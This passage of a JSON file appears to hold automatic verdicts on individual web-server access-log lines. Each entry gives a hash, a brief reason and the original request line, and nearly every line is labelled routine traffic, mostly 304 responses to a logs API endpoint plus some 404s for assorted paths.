}, "bb2eb8bd6d023ddae87a016190e6284f0756d40f877a0b88059df43df5d5aa8f": { "type": "hash", "value": "bb2eb8bd6d023ddae87a016190e6284f0756d40f877a0b88059df43df5d5aa8f", "source": "auto", "reason": "Looks like a normal HTTP GET to an API endpoint returning 304 (not modified) with a response time.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.592 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:36:27.83978868Z" }, "bb4669c01ee3a5d41a70c670cce404cc1c7ab7b96bc2c9bfdbf435bd518d02ab": { "type": "hash", "value": "bb4669c01ee3a5d41a70c670cce404cc1c7ab7b96bc2c9bfdbf435bd518d02ab", "source": "auto", "reason": "Appears to be a routine HTTP GET request to an application logs endpoint with a 304 status and reasonable latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 19.551 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:30:48.983250846Z" }, "bc78bbfaa346386cf9fc26e11a7424f5a39e959ed067225545bf8514c2fcb1a3": { "type": "hash", "value": "bc78bbfaa346386cf9fc26e11a7424f5a39e959ed067225545bf8514c2fcb1a3", "source": "auto", "reason": "Normal HTTP GET for robots.txt with 200 status indicates routine static asset access.", "original_line": "\u001b[0mGET /robots.txt \u001b[32m200\u001b[\u003cDUR\u003e 1.852 ms - 26\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:11:18.072864583Z" }, "bc9a2f1aa679a70ac9f07c29b85561054780833b463a3215c1bbe174aa1f1ce7": { "type": "hash", "value": "bc9a2f1aa679a70ac9f07c29b85561054780833b463a3215c1bbe174aa1f1ce7", "source": "auto", "reason": "Routine HTTP GET request to an API endpoint returning 304 (not modified) with a duration, typical of normal client polling/caching.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 29.175 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:26:27.687006362Z" }, "bd24c80eb542d67e4e7c7f5fc1ac9c08ceef61e9ae4a600492b4696e66a3823d": { "type": "hash", "value": "bd24c80eb542d67e4e7c7f5fc1ac9c08ceef61e9ae4a600492b4696e66a3823d", "source": "auto", "reason": "Regular HTTP GET request to a static asset with status 200 and small duration typical of normal traffic", "original_line": "\u001b[0mGET /static/css/main.86a54358.css \u001b[32m200\u001b[\u003cDUR\u003e 1.599 ms - \u003cNUM\u003e\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T10:32:44.488491615Z" }, "bdeb6e1163240e58f13be69f38435712ce5da520b9dfbde34812c20418f9e9cf": { "type": "hash", "value": "bdeb6e1163240e58f13be69f38435712ce5da520b9dfbde34812c20418f9e9cf", "source": "auto", "reason": "Routine HTTP GET request to an application logs endpoint returning 304 (not modified) with sub-30ms latency; appears to be normal client polling/caching behavior.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.909 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:35:57.938114139Z" }, "be6667bc0f16ae4f8bb1efbfecce3e7c145d11acc43700ca71b2ffa0584504bb": { "type": "hash", "value": "be6667bc0f16ae4f8bb1efbfecce3e7c145d11acc43700ca71b2ffa0584504bb", "source": "auto", "reason": "Looks like a normal HTTP GET request to an application API endpoint returning a 304 status and a normal latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.399 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:33:00.875257466Z" }, "bf184b363b720a39e249af44f44187f6a7e8d5610f16c0cba1f1163d70683e50": { "type": "hash", "value": "bf184b363b720a39e249af44f44187f6a7e8d5610f16c0cba1f1163d70683e50", "source": "auto", "reason": "Regular web server log entry for a POST request to root returning 404; nothing indicates attack behavior.", "original_line": "\u001b[0mPOST / \u001b[33m404\u001b[\u003cDUR\u003e 0.379 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T06:40:40.132071938Z" }, "c00874bdf4985a3cdec3603e1926e3d2a6190f7b20521f732f9b5623d02070dd": { "type": "hash", "value": "c00874bdf4985a3cdec3603e1926e3d2a6190f7b20521f732f9b5623d02070dd", "source": "auto", "reason": "Normal HTTP access line with a standard 200 response and a small duration.", "original_line": "\u001b[0mGET /api/v1/config.map \u001b[32m200\u001b[\u003cDUR\u003e 0.536 ms - 83\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:34:42.479314444Z" }, "c0696a4b2b15dbe4339aa8aad17ec0433a1dd0b7c2a97edd600f7dc1c803c8c4": { "type": "hash", "value": "c0696a4b2b15dbe4339aa8aad17ec0433a1dd0b7c2a97edd600f7dc1c803c8c4", "source": "auto", "reason": "Normal HTTP request to root with 200 status in a containerized environment", "original_line": "\u001b[0mGET / \u001b[32m200\u001b[\u003cDUR\u003e 0.865 ms - 978\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T08:36:09.810577618Z" }, "c073d4a4d42eb7d97097e30df31c7f51b101be525eec6aed5e863a136b841fdc": { "type": "hash", "value": "c073d4a4d42eb7d97097e30df31c7f51b101be525eec6aed5e863a136b841fdc", "source": "auto", "reason": "HTTP GET request to an application logs endpoint returning 304 (not modified); response time appears normal.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.733 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:32:54.858851387Z" }, "c0864ff5d220338c27cce07632ae922996b59bd4db0379c32e672a1868afd1b5": { "type": "hash", "value": "c0864ff5d220338c27cce07632ae922996b59bd4db0379c32e672a1868afd1b5", "source": "auto", "reason": "Routine HTTP GET to an application logs endpoint returning 304 (not modified) with a short duration; typical of normal client polling/caching.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.113 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:39:42.986370851Z" }, "c0d195eacb949dd6da4bf6dbe2a242e6370a97c38c5ed414ade31f488562da3c": { "type": "hash", "value": "c0d195eacb949dd6da4bf6dbe2a242e6370a97c38c5ed414ade31f488562da3c", "source": "auto", "reason": "Looks like a routine HTTP GET to an application API endpoint with a 304 status and measured latency; no exploit indicators.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.162 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:28:25.708920962Z" }, "c1073194cc86f32d1d28176e74d5e769da44522cacba46c7abb5b2f20debc893": { "type": "hash", "value": "c1073194cc86f32d1d28176e74d5e769da44522cacba46c7abb5b2f20debc893", "source": "auto", "reason": "HTTP GET request to an API logs endpoint with a 304 status and normal latency; appears to be routine container access.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.519 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:25:27.776703567Z" }, "c10b91ea1e4c4ef6dbfe6158cea219bc914326ea7f06ba7889fde11222dff74c": { "type": "hash", "value": "c10b91ea1e4c4ef6dbfe6158cea219bc914326ea7f06ba7889fde11222dff74c", "source": "auto", "reason": "Routine HTTP GET request to application logs endpoint returning 304 (not modified) with normal latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 22.149 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:33:42.691007312Z" }, "c18e5cd21b313e19dcf664d35ac73056f78f3ae29f4f78f1ace28380f2e79c33": { "type": "hash", "value": "c18e5cd21b313e19dcf664d35ac73056f78f3ae29f4f78f1ace28380f2e79c33", "source": "auto", "reason": "HTTP GET to an API endpoint returning 304 (Not Modified) with a small latency looks like normal client caching behavior from a Dockerized service.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 22.040 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:24:39.788303402Z" }, "c20ef09b2802c94ff13452d75fed3bb0008b6bf0af7c8318c5c3f24dba26493c": { "type": "hash", "value": "c20ef09b2802c94ff13452d75fed3bb0008b6bf0af7c8318c5c3f24dba26493c", "source": "auto", "reason": "Normal 404 GET request to a static path on a web server; no suspicious indicators", "original_line": "\u001b[0mGET /wp-content/uploads/wc-logs/ \u001b[33m404\u001b[\u003cDUR\u003e 0.672 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:27:43.399670664Z" }, "c2131d4ba1255aeae2ffa27d3fcc6a51f564ff46070cc67377cec50de919118a": { "type": "hash", "value": "c2131d4ba1255aeae2ffa27d3fcc6a51f564ff46070cc67377cec50de919118a", "source": "auto", "reason": "Looks like a routine HTTP GET to an application logs endpoint with a 304 (not modified), indicating normal caching/conditional request behavior.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.478 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:41:00.900213074Z" }, "c25a39ad876c29cfde5be6e2e07c3e96d8dadc6163d59b03b221da359d774d1e": { "type": "hash", "value": "c25a39ad876c29cfde5be6e2e07c3e96d8dadc6163d59b03b221da359d774d1e", "source": "auto", "reason": "Appears to be a routine HTTP GET request to an application logs API returning 304 (not modified) with normal latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.489 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:27:42.77965815Z" }, "c2ab1370431c78e3c1d6db574bafd2845198348153128e00b8ec1d4c3fc7aeaf": { "type": "hash", "value": "c2ab1370431c78e3c1d6db574bafd2845198348153128e00b8ec1d4c3fc7aeaf", "source": "auto", "reason": "Looks like a routine HTTP GET to an API endpoint returning 304 (not modified) with a response time in ms.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.652 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:41:39.758040188Z" }, "c4d6dc0bad80f92abcd05e98a0bae86f51f78de9c27614b4b65aec665a69fc29": { "type": "hash", "value": "c4d6dc0bad80f92abcd05e98a0bae86f51f78de9c27614b4b65aec665a69fc29", "source": "auto", "reason": "Normal HTTP access log showing a GET request to index.js returning 404 is common and not indicative of an attack.", "original_line": "\u001b[0mGET /index.js \u001b[33m404\u001b[\u003cDUR\u003e 2.601 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:25:05.176868106Z" }, "c6212fd7e5f9138f8e2812ec98e7bc4528158c68b8b310c1c527cd94e377ba6f": { "type": "hash", "value": "c6212fd7e5f9138f8e2812ec98e7bc4528158c68b8b310c1c527cd94e377ba6f", "source": "auto", "reason": "Looks like a routine HTTP GET to an application logs endpoint returning 304 (not modified) with a normal response time.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 19.558 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:30:21.95812506Z" }, "c6d74a8f4ed81df820071acfa7d2d417922d73944326ef334cb75514c3959229": { "type": "hash", "value": "c6d74a8f4ed81df820071acfa7d2d417922d73944326ef334cb75514c3959229", "source": "auto", "reason": "Single HTTP 404 for a GET on /checkout with a small response duration; typical web traffic behavior and not indicative of attack.", "original_line": "\u001b[0mGET /checkout \u001b[33m404\u001b[\u003cDUR\u003e 0.559 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:18:32.823755544Z" }, "c6e6072b73901b88937400e7bbe7021bd2539b9a313d1e792670631e4fd568d6": { "type": "hash", "value": "c6e6072b73901b88937400e7bbe7021bd2539b9a313d1e792670631e4fd568d6", "source": "auto", "reason": "Routine HTTP GET request to application logs endpoint with a 304 response and a duration; no clear attack indicators.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 67.845 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:35:03.731096998Z" }, "c7700b504f2e263c49c819a788bb2e4574e6b34bf04f805fe91765b9f947f679": { "type": "hash", "value": "c7700b504f2e263c49c819a788bb2e4574e6b34bf04f805fe91765b9f947f679", "source": "auto", "reason": "Looks like a routine HTTP GET request to an internal API endpoint returning 304 (not modified), with a typical access-log timing and status line.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 31.126 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:30:54.972250624Z" }, "c7b587004b6e198956e37112468c7bb28e44feeaada2856805dfd75fa8b5cd57": { "type": "hash", "value": "c7b587004b6e198956e37112468c7bb28e44feeaada2856805dfd75fa8b5cd57", "source": "auto", "reason": "Routine HTTP GET request to an API endpoint returning status 304 (not modified) with a normal low latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.927 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:27:51.829892978Z" }, "c7c3824a688261c53a1e15e22b83e2212831aff97785e32aaf9fd70cc93f1908": { "type": "hash", "value": "c7c3824a688261c53a1e15e22b83e2212831aff97785e32aaf9fd70cc93f1908", "source": "auto", "reason": "Routine HTTP GET request to an API endpoint returning 304 (not modified) with a short duration; typical for normal client polling/caching.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.178 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:34:09.776597317Z" }, "c8392bbfa808875fc15af8fc865d9df97b3dad1ffff4ec428ecba3e860ff4faa": { "type": "hash", "value": "c8392bbfa808875fc15af8fc865d9df97b3dad1ffff4ec428ecba3e860ff4faa", "source": "auto", "reason": "Looks like a normal authenticated API GET request returning HTTP 304 (not modified) with a response time.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 19.906 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:39:18.872410155Z" }, "c84babdfd56c3dd080ef24e7e71065548b1a36dee2ecfd34f8bef0ed6ee44671": { "type": "hash", "value": "c84babdfd56c3dd080ef24e7e71065548b1a36dee2ecfd34f8bef0ed6ee44671", "source": "auto", "reason": "Docker service access log shows a normal HTTP GET request returning status 304 with a typical latency; no exploit indicators.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.523 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:42:25.668211505Z" }, "c896d386754dde38b15d3f7e6b3bb443fabaa5424eff5922b7203d0a0a3eb273": { "type": "hash", "value": "c896d386754dde38b15d3f7e6b3bb443fabaa5424eff5922b7203d0a0a3eb273", "source": "auto", "reason": "HTTP GET to an application logs endpoint returning 304 (not modified) with a normal latency value; appears routine access.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.281 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:37:33.627634982Z" }, "c939cbfc07fd0d3f98da058ad6f1ab6121b367f08e39e9f6c301020685405b71": { "type": "hash", "value": "c939cbfc07fd0d3f98da058ad6f1ab6121b367f08e39e9f6c301020685405b71", "source": "auto", "reason": "Normal HTTP request for a resource that returned 404. Not indicative of an attack; common during normal operation.", "original_line": "\u001b[0mGET /billing \u001b[33m404\u001b[\u003cDUR\u003e 0.635 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:11:22.94911812Z" }, "c948e35e9b4c4100a9e4b27923b327c11b695c056d69c9c5300d4fbcf4a68146": { "type": "hash", "value": "c948e35e9b4c4100a9e4b27923b327c11b695c056d69c9c5300d4fbcf4a68146", "source": "auto", "reason": "Regular HTTP GET to an application API endpoint returning 304 (not modified) with a typical duration; appears like routine client polling/caching behavior.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 22.464 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:39:51.808306575Z" }, "c9808f1f2a6bfda20099ccbd82c25be92839d334c559bd9535f6b662f33dc35d": { "type": "hash", "value": "c9808f1f2a6bfda20099ccbd82c25be92839d334c559bd9535f6b662f33dc35d", "source": "auto", "reason": "Routine HTTP GET to an application logs endpoint with a 304 response and normal latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 22.063 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:38:48.765372553Z" }, "ca69048bc406e295f130b78b0bb0707297d5c67c639fd53bb1480303596a8095": { "type": "hash", "value": "ca69048bc406e295f130b78b0bb0707297d5c67c639fd53bb1480303596a8095", "source": "auto", "reason": "Looks like a routine HTTP GET request from the API returning status 304 (not modified), with timing present.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.290 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:31:54.933286694Z" }, "cb568c15c266150b8bb534aba42c8a7ace3c75b6b7d204097d4eaad31f8e1d06": { "type": "hash", "value": "cb568c15c266150b8bb534aba42c8a7ace3c75b6b7d204097d4eaad31f8e1d06", "source": "auto", "reason": "Routine HTTP GET request to a logs endpoint returning 304 (not modified); typical access log entry.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 25.974 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:25:06.957991633Z" }, "ce499808fa7afd84442f1d274a428c28bf6e1189d7192b979a0a3e89e48ef948": { "type": "hash", "value": "ce499808fa7afd84442f1d274a428c28bf6e1189d7192b979a0a3e89e48ef948", "source": "auto", "reason": "Looks like a routine HTTP GET returning 304 (not modified) with a normal duration, no attack indicators.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 22.932 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:30:12.909281579Z" }, "ce986960857527d841390268b7de9feb15245262dbb2d3a10448cfde02506cbe": { "type": "hash", "value": "ce986960857527d841390268b7de9feb15245262dbb2d3a10448cfde02506cbe", "source": "auto", "reason": "Routine HTTP GET to an application logs endpoint with a 304 response; latency present and no obvious error/attack indicators.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.237 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:35:34.029118395Z" }, "cf04752367d204f5319fb16e989f6c2d2dc9a806a7ae07be3f1063fe136cb632": { "type": "hash", "value": "cf04752367d204f5319fb16e989f6c2d2dc9a806a7ae07be3f1063fe136cb632", "source": "auto", "reason": "Normal static file request resulting in 404 (env.js.map) is common and not indicative of an attack.", "original_line": "\u001b[0mGET /env.js.map \u001b[33m404\u001b[\u003cDUR\u003e 0.849 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:25:27.395123004Z" }, "cf0d34f9e8a0fc1e229c487491b8967c7af2412fe24aa77164e7f592cae2d72f": { "type": "hash", "value": "cf0d34f9e8a0fc1e229c487491b8967c7af2412fe24aa77164e7f592cae2d72f", "source": "auto", "reason": "Docker service shows a routine HTTP GET to an app logs endpoint returning 304 (not modified) with a typical latency and no error indicators.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 29.163 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:41:54.830974881Z" }, "d331f2f449fcb39fee6edf6ee950bb33c243c9f32b9b3e11c9d22c6864acece3": { "type": "hash", "value": "d331f2f449fcb39fee6edf6ee950bb33c243c9f32b9b3e11c9d22c6864acece3", "source": "auto", "reason": "Appears to be a routine HTTP GET returning 304 (not modified) with a small response time; consistent with normal client polling/cache validation.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api \u001b[36m304\u001b[\u003cDUR\u003e 2.073 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:39:24.767134688Z" }, "d40317a86a605ac597aa98859e675c62de7f09709c2c99903412fa54d10e62bb": { "type": "hash", "value": "d40317a86a605ac597aa98859e675c62de7f09709c2c99903412fa54d10e62bb", "source": "auto", "reason": "Routine HTTP GET request to an application API endpoint returning status 304 (not modified), with normal latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.045 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:30:34.028919507Z" }, "d40c9b02259dda989901964b573f24545a85e8e55f7685ea93c6f22e9f9d4077": { "type": "hash", "value": "d40c9b02259dda989901964b573f24545a85e8e55f7685ea93c6f22e9f9d4077", "source": "auto", "reason": "HTTP GET to an application logs endpoint returning 304 (Not Modified), with normal small latency; appears routine for web/app caching behavior.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.476 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:32:30.792684451Z" }, "d5049adabbbb458cb5561203cfc361f5587415e04d395c9559715f30106aea09": { "type": "hash", "value": "d5049adabbbb458cb5561203cfc361f5587415e04d395c9559715f30106aea09", "source": "auto", "reason": "Looks like a normal HTTP GET request to an app logs endpoint returning 304 (not modified) with a reasonable latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 19.915 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:36:00.889929166Z" }, "d68243318f10e665131f84f96e5bb7b4aff52154ee15d07a42505a4b62fe0985": { "type": "hash", "value": "d68243318f10e665131f84f96e5bb7b4aff52154ee15d07a42505a4b62fe0985", "source": "auto", "reason": "HTTP GET request to an internal API endpoint returning 304 (not modified) with a short duration; looks like routine polling/caching behavior.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.666 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:38:06.775767656Z" }, "d6a76fd6d671b41ce1f3382bedc5ee3aaad9a26c98da21ecba6349c2c82ad03c": { "type": "hash", "value": "d6a76fd6d671b41ce1f3382bedc5ee3aaad9a26c98da21ecba6349c2c82ad03c", "source": "auto", "reason": "Routine HTTP GET request to an application API endpoint with a 304 status and response time; no exploit indicators.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 37.491 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:27:48.908940425Z" }, "d6f11b2a79ae3e7ba5cfc43f71496ff59f29c9cecb1c47abf780a84636720ab2": { "type": "hash", "value": "d6f11b2a79ae3e7ba5cfc43f71496ff59f29c9cecb1c47abf780a84636720ab2", "source": "auto", "reason": "Looks like a routine HTTP GET to an application API endpoint returning 304 (not modified) with a normal latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.276 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:35:18.821450146Z" }, "d70561fa95e76cc7f421952774bf496c55c1c37cd1a1a56efa26e7b5375c5c9e": { "type": "hash", "value": "d70561fa95e76cc7f421952774bf496c55c1c37cd1a1a56efa26e7b5375c5c9e", "source": "auto", "reason": "Regular HTTP access log returning 404 for a config file; not indicative of abuse.", "original_line": "\u001b[0mGET /config/stripe.ts \u001b[33m404\u001b[\u003cDUR\u003e 0.564 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:29:32.028302458Z" }, "d71a5a646d4ba5ee4700a275be348d290e783b5fd605f95936a798496cbd1b08": { "type": "hash", "value": "d71a5a646d4ba5ee4700a275be348d290e783b5fd605f95936a798496cbd1b08", "source": "auto", "reason": "Routine HTTP GET for an application log endpoint returning 304 (not modified) with a normal latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 19.849 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:36:06.684699052Z" }, "d74d3ab5883c3ef54c6ec125525f450db904e17bfa6fdb0391aab026f3b4a071": { "type": "hash", "value": "d74d3ab5883c3ef54c6ec125525f450db904e17bfa6fdb0391aab026f3b4a071", "source": "auto", "reason": "Routine HTTP GET request to application logs endpoint returning 304 (not modified); latency and status look normal.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.641 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:34:36.910212978Z" }, "d7d927cb1d93f4e0d8a99925ac80d0d2e69a92c7b0799148e0c6095c00a43629": { "type": "hash", "value": "d7d927cb1d93f4e0d8a99925ac80d0d2e69a92c7b0799148e0c6095c00a43629", "source": "auto", "reason": "Routine HTTP GET request to an API endpoint returning 304 (not modified), with low latency typical of normal operation.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api \u001b[36m304\u001b[\u003cDUR\u003e 2.070 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:30:24.638960834Z" }, "d7ddb4dfdf62a058242eeb6784f965c8adaffecb34c2dd648dca4d11deeb1839": { "type": "hash", "value": "d7ddb4dfdf62a058242eeb6784f965c8adaffecb34c2dd648dca4d11deeb1839", "source": "auto", "reason": "Normal HTTP access log returning 404 for a source map, common in web deployments; no evidence of misuse.", "original_line": "\u001b[0mGET /vendor.js.map \u001b[33m404\u001b[\u003cDUR\u003e 2.536 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:25:56.339583274Z" }, "d8a6eedf14dc284e591768964ba5a68b4c8780c484b48d71895d27035af19368": { "type": "hash", "value": "d8a6eedf14dc284e591768964ba5a68b4c8780c484b48d71895d27035af19368", "source": "auto", "reason": "Looks like a routine HTTP GET to an internal API endpoint returning status 304 with a measured latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 42.429 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:42:03.799810379Z" }, "d8d88c0ed9be0cc8f62cdc43b615cd461b7d96cd8f1e1d8ac6da722d1fe08d93": { "type": "hash", "value": "d8d88c0ed9be0cc8f62cdc43b615cd461b7d96cd8f1e1d8ac6da722d1fe08d93", "source": "auto", "reason": "HTTP GET to an application logs endpoint returning status 304; appears to be routine client caching/health-style behavior with normal latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 23.598 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:29:54.958833708Z" }, "d96f7808bac328e85950439de1ac8d0427090233158ab172b69ced0c807c2e40": { "type": "hash", "value": "d96f7808bac328e85950439de1ac8d0427090233158ab172b69ced0c807c2e40", "source": "auto", "reason": "Normal HTTP 200 response in a Dockerized nginx-like service. No anomalies detected.", "original_line": "\u001b[0mGET / \u001b[32m200\u001b[\u003cDUR\u003e 0.612 ms - 978\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T08:35:23.233886352Z" }, "d99daeef871efc14ae4843538efc7d1db23267992dd150a6e9dce2adf409a735": { "type": "hash", "value": "d99daeef871efc14ae4843538efc7d1db23267992dd150a6e9dce2adf409a735", "source": "auto", "reason": "Routine HTTP GET request to an application logs endpoint with a 304 status and low latency; appears to be normal access traffic.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.921 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:40:26.193036522Z" }, "d9a45a69ccf527c1ef6f4f30a95970339ba7301bdf133edf43bf2ced0e7c2cad": { "type": "hash", "value": "d9a45a69ccf527c1ef6f4f30a95970339ba7301bdf133edf43bf2ced0e7c2cad", "source": "auto", "reason": "Routine HTTP GET to an internal API endpoint returning 304 (not modified) with response time.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 19.472 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:39:54.734314699Z" }, "d9a7674e8178c9dca8a3ea53a08bdeca423b8f51f785b68fd57f9befc078275a": { "type": "hash", "value": "d9a7674e8178c9dca8a3ea53a08bdeca423b8f51f785b68fd57f9befc078275a", "source": "auto", "reason": "Routine authenticated-style HTTP GET to an application logs endpoint returning 304 (not modified) with normal latency; appears to be normal app behavior.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 23.639 ms - 